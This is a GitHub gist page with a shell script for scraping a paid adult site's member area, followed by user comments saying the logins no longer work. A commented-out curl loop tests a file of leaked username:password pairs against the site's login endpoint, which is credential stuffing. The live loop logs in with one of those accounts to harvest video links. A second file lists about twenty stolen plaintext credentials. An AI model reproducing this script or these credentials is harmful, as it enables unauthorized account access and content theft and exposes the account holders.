Last active
July 30, 2024 14:04
-
-
Save dardo82/e95c445f1e951167e89eb78cba315a99 to your computer and use it in GitHub Desktop.
Ewa Sonnet site DL
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# Download EwaSonnet's videos and photos. | |
# for i in $(cat cred.txt); do curl -L -s 3wasonnet.com/tour/do_member_login_acms4.php \ | |
# -d "$(echo $i|sed -E 's/^| / username=/;s/:/\&pass=/')&btn=++Login++"; echo $i; done \ | |
# | sed -n '/already/s/.*>//p' | |
for n in {1..24};do | |
curl -Lsu 'odinboy:thebobby' www.3wasonnet.com/members/latest-videos/page/$n/|tr\ | |
'"' '\n'|egrep -i '^h.*rs/[[:alnum:]]+(-[[:alnum:]]*)+(-[[:digit:]])*$'|uniq -d | |
done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
krimzon:pyro9875 haslo:prosiak karwen:hugoboss jsuglia:zzxxcc nerfo3:diplomat nhahsiew:grist789 pete1122:fooman11 realbook:proximus sirachim:Achim01 odinboy:thebobby shomina:minami3 zoulou:vision FRANCOIS:LOLOLO MasaSasa:3484masa Obauer:09051986 Boronion:boronion XXXLover:5136xxx bebiboi:vhkzkca7 bereksas:bultaco adidas:sourmash |
Can you update? Not working
The password is wrong? 🤔
The password is wrong? 🤔
yes
The password is wrong? 🤔
yes
Did you try the other ones? 🤔
yes, none of them work
yes, none of them work
I've found them around the internet, maybe you can do the same, let me know if you have any success at all, thanks.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Can you update? Not working